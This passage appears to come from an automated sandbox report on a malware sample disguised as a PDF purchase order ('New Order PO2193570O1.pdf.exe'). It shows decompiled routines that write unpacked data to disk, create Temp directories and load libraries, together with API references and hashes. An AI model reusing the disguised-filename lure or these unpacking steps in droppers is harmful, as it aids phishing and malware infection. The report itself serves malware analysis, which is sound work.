				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					L2:
					_t12 =  *0x417048; // 0x691a7
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x55edd0
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
								E00402BD3(0);
							}
						}
						 *0x40afd8 = 0x40b040;
						 *0x40afdc = 0x8000; // executed
						_t16 = E00405F82(0x40afb8); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd8; // 0x40caed
						_t40 = _t39 - 0x40b040;
						if(_t40 == 0) {
							__eflags =  *0x40afd4; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x417044; // 0x49d5c
							if(_t18 -  *0x40afb0 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409018, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afb0 =  *0x40afb0 + _t40;
							_t53 =  *0x40afd4; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}




















                                                                                                                              0x00403047
                                                                                                                              0x00403054
                                                                                                                              0x00403067
                                                                                                                              0x0040306c
                                                                                                                              0x004031ad
                                                                                                                              0x004031af
                                                                                                                              0x00000000
                                                                                                                              0x004031b5
                                                                                                                              0x00403078
                                                                                                                              0x0040308b
                                                                                                                              0x00403091
                                                                                                                              0x00403097
                                                                                                                              0x004030a2
                                                                                                                              0x004030a2
                                                                                                                              0x004030a2
                                                                                                                              0x004030a7
                                                                                                                              0x004030ac
                                                                                                                              0x004030b4
                                                                                                                              0x004030b6
                                                                                                                              0x004030b6
                                                                                                                              0x004030bf
                                                                                                                              0x004030c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004030cc
                                                                                                                              0x004030d2
                                                                                                                              0x004030d8
                                                                                                                              0x004030de
                                                                                                                              0x004030de
                                                                                                                              0x004030e4
                                                                                                                              0x004030e6
                                                                                                                              0x004030ec
                                                                                                                              0x00403104
                                                                                                                              0x00403109
                                                                                                                              0x0040310e
                                                                                                                              0x004030ec
                                                                                                                              0x00403114
                                                                                                                              0x0040311a
                                                                                                                              0x00403124
                                                                                                                              0x0040312b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040312d
                                                                                                                              0x00403133
                                                                                                                              0x00403135
                                                                                                                              0x00403169
                                                                                                                              0x0040316f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403171
                                                                                                                              0x00403173
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403175
                                                                                                                              0x00403175
                                                                                                                              0x00403188
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403197
                                                                                                                              0x00000000
                                                                                                                              0x00403197
                                                                                                                              0x00403145
                                                                                                                              0x0040314d
                                                                                                                              0x004031a4
                                                                                                                              0x004031aa
                                                                                                                              0x004031aa
                                                                                                                              0x00000000
                                                                                                                              0x00403155
                                                                                                                              0x00403155
                                                                                                                              0x0040315b
                                                                                                                              0x00403161
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403167
                                                                                                                              0x0040314d
                                                                                                                              0x004031a8
                                                                                                                              0x00000000
                                                                                                                              0x004031a8
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00403058
                                                                                                                                • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,000303E4), ref: 004031FF
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                                              • WriteFile.KERNELBASE(0040B040,0040CAED,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                                              • SetFilePointer.KERNELBASE(00049D5C,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Pointer$CountTickWrite
                                                                                                                              • String ID: @0A
                                                                                                                              • API String ID: 2146148272-1363546919
                                                                                                                              • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                                              • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                                              • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                                              • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                              0x00401f51
                                                                                                                              0x00401f51
                                                                                                                              0x00401f56
                                                                                                                              0x00401f5d
                                                                                                                              0x00402019
                                                                                                                              0x00402164
                                                                                                                              0x00402164
                                                                                                                              0x0040288b
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a
                                                                                                                              0x0040289a
                                                                                                                              0x00401f6c
                                                                                                                              0x00401f76
                                                                                                                              0x00401f79
                                                                                                                              0x00401f88
                                                                                                                              0x00401f8c
                                                                                                                              0x00401f92
                                                                                                                              0x00401f96
                                                                                                                              0x00402012
                                                                                                                              0x00000000
                                                                                                                              0x00402012
                                                                                                                              0x00401f98
                                                                                                                              0x00401fa2
                                                                                                                              0x00401fa6
                                                                                                                              0x00401fea
                                                                                                                              0x00401fa8
                                                                                                                              0x00401fab
                                                                                                                              0x00401fae
                                                                                                                              0x00401fde
                                                                                                                              0x00401fb0
                                                                                                                              0x00401fb3
                                                                                                                              0x00401fbc
                                                                                                                              0x00401fbe
                                                                                                                              0x00401fbe
                                                                                                                              0x00401fbc
                                                                                                                              0x00401fae
                                                                                                                              0x00401ff2
                                                                                                                              0x00402007
                                                                                                                              0x00402007
                                                                                                                              0x00000000
                                                                                                                              0x00401ff2
                                                                                                                              0x00401f7c
                                                                                                                              0x00401f82
                                                                                                                              0x00401f86
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                                • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                                • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                                • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                                • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                              • String ID: ?B
                                                                                                                              • API String ID: 2987980305-117478770
                                                                                                                              • Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                                              • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                                              • Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                                              • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                              0x004015b3
                                                                                                                              0x004015ba
                                                                                                                              0x004015bd
                                                                                                                              0x004015c2
                                                                                                                              0x004015c6
                                                                                                                              0x004015c8
                                                                                                                              0x004015d0
                                                                                                                              0x004015d6
                                                                                                                              0x004015d8
                                                                                                                              0x004015db
                                                                                                                              0x004015e3
                                                                                                                              0x004015f0
                                                                                                                              0x004015fd
                                                                                                                              0x004015fd
                                                                                                                              0x004015f2
                                                                                                                              0x004015f3
                                                                                                                              0x004015fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004015fb
                                                                                                                              0x004015f0
                                                                                                                              0x00401600
                                                                                                                              0x00401603
                                                                                                                              0x00401605
                                                                                                                              0x00401606
                                                                                                                              0x004015c8
                                                                                                                              0x0040160d
                                                                                                                              0x0040162d
                                                                                                                              0x00402164
                                                                                                                              0x0040160f
                                                                                                                              0x00401611
                                                                                                                              0x0040161c
                                                                                                                              0x00401622
                                                                                                                              0x00401622
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 004056FB
                                                                                                                                • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                                                • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                              • API String ID: 3751793516-501415292
                                                                                                                              • Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                                              • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                                              • Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                                              • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                              0x00405870
                                                                                                                              0x00405876
                                                                                                                              0x00405877
                                                                                                                              0x00405877
                                                                                                                              0x00405878
                                                                                                                              0x0040587f
                                                                                                                              0x00405889
                                                                                                                              0x00405896
                                                                                                                              0x00405899
                                                                                                                              0x004058a1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004058a5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004058a7
                                                                                                                              0x00000000
                                                                                                                              0x004058a7
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                              • String ID: "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                              • API String ID: 1716503409-2319296430
                                                                                                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                              • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                              • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B16DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E709B16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x709b405c = _a8;
				 *0x709b4060 = _a16;
				 *0x709b4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x709b4038, E709B1556);
				_push(1); // executed
				_t37 = E709B1A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E709B22AF(_t54);
					}
					E709B22F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E709B24D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E709B156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E709B24D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E709B24D8(_t54);
							_t37 = GlobalFree(E709B1266(E709B1559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E709B249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E709B14E2( *0x709b4058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E709B2CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E709B2A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E709B26B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                                              0x709b16db
                                                                                                                              0x709b16db
                                                                                                                              0x709b16db
                                                                                                                              0x709b16e5
                                                                                                                              0x709b16ed
                                                                                                                              0x709b16fa
                                                                                                                              0x709b1708
                                                                                                                              0x709b170b
                                                                                                                              0x709b170d
                                                                                                                              0x709b1712
                                                                                                                              0x709b1717
                                                                                                                              0x709b1836
                                                                                                                              0x709b1836
                                                                                                                              0x709b171d
                                                                                                                              0x709b1721
                                                                                                                              0x709b1724
                                                                                                                              0x709b1729
                                                                                                                              0x709b172b
                                                                                                                              0x709b1731
                                                                                                                              0x709b1737
                                                                                                                              0x709b1767
                                                                                                                              0x709b176e
                                                                                                                              0x709b1792
                                                                                                                              0x709b17dd
                                                                                                                              0x709b1794
                                                                                                                              0x709b1794
                                                                                                                              0x709b1795
                                                                                                                              0x709b179b
                                                                                                                              0x709b179c
                                                                                                                              0x709b17a6
                                                                                                                              0x709b17a9
                                                                                                                              0x709b17ae
                                                                                                                              0x709b17b5
                                                                                                                              0x709b17b5
                                                                                                                              0x709b17bc
                                                                                                                              0x709b17c2
                                                                                                                              0x709b17c8
                                                                                                                              0x709b17d5
                                                                                                                              0x709b17d6
                                                                                                                              0x709b17d9
                                                                                                                              0x709b1770
                                                                                                                              0x709b1771
                                                                                                                              0x709b1786
                                                                                                                              0x709b1786
                                                                                                                              0x709b17e7
                                                                                                                              0x709b17ea
                                                                                                                              0x709b17f7
                                                                                                                              0x709b17fe
                                                                                                                              0x709b1806
                                                                                                                              0x709b1809
                                                                                                                              0x709b1809
                                                                                                                              0x709b1806
                                                                                                                              0x709b1816
                                                                                                                              0x709b181e
                                                                                                                              0x709b1823
                                                                                                                              0x709b1816
                                                                                                                              0x709b182b
                                                                                                                              0x00000000
                                                                                                                              0x709b182d
                                                                                                                              0x00000000
                                                                                                                              0x709b182e
                                                                                                                              0x709b182b
                                                                                                                              0x709b173b
                                                                                                                              0x709b173e
                                                                                                                              0x709b175c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b175f
                                                                                                                              0x709b1764
                                                                                                                              0x709b1764
                                                                                                                              0x709b1766
                                                                                                                              0x00000000
                                                                                                                              0x709b1766
                                                                                                                              0x709b1740
                                                                                                                              0x709b1741
                                                                                                                              0x709b1749
                                                                                                                              0x709b174a
                                                                                                                              0x00000000
                                                                                                                              0x709b174a
                                                                                                                              0x709b1743
                                                                                                                              0x709b1744
                                                                                                                              0x709b1752
                                                                                                                              0x00000000
                                                                                                                              0x709b1752
                                                                                                                              0x709b1747
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1747

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 709B1A98: GlobalFree.KERNEL32 ref: 709B1D09
                                                                                                                                • Part of subcall function 709B1A98: GlobalFree.KERNEL32 ref: 709B1D0E
                                                                                                                                • Part of subcall function 709B1A98: GlobalFree.KERNEL32 ref: 709B1D13
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B1786
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 709B1809
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B182E
                                                                                                                                • Part of subcall function 709B22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 709B22E0
                                                                                                                                • Part of subcall function 709B26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,709B1757,00000000), ref: 709B2782
                                                                                                                                • Part of subcall function 709B156B: wsprintfA.USER32 ref: 709B1599
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
